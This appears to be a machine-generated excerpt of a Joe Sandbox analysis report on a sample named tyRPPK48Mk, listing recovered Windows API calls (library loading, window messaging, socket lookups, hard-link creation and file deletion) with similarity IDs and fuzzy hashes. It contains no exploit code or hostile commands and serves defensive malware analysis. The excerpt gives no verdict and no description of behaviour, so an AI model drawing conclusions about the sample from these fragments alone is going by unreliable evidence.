• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-4033151799
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-1816364905
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430E8D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00430E9F
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-199464113
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,0040E5C8), ref: 0040EF6B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EF7D
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-3024904723
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,0040E620), ref: 0040EFDB
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EFED
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-192647395
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2808897238-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                                                                                                                                                                                                                                                                                                                                                • __itow.LIBCMT ref: 004699CD
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                                                                                                                                                                                                                                                                                                                                                                • __itow.LIBCMT ref: 00469A97
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$__itow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3379773720-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2782032738-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                                                                                                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                                                                                                                                                                                                                                                                                                                                                                • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                                                                                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                                                                                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3058430110-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 004503C8
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Proc$Parent
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2351499541-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004367CF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004367E1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00461F92
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00461FC1
                                                                                                                                                                                                                                                                                                                                                                                                                                • __itow.LIBCMT ref: 00461FD2
                                                                                                                                                                                                                                                                                                                                                                                                                                • __itow.LIBCMT ref: 00462016
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$__itow$_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3055246884-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                                                                                                                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00442B01
                                                                                                                                                                                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                                                                                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchTranslate
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1795658109-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 0047439C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                                                                                                                                                                                                                                                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __setmode$DebugOutputString_fprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1792727568-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                                                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                                                                                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: cdecl
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3850814276-3896280584
APIs
  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
• gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
• WSAGetLastError.WSOCK32(00000000), ref: 0046D439
• _memmove.LIBCMT ref: 0046D475
• inet_ntoa.WSOCK32(?), ref: 0046D481
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 2502553879-0
APIs
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
• accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
• WSAGetLastError.WSOCK32(00000000), ref: 00458B03
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
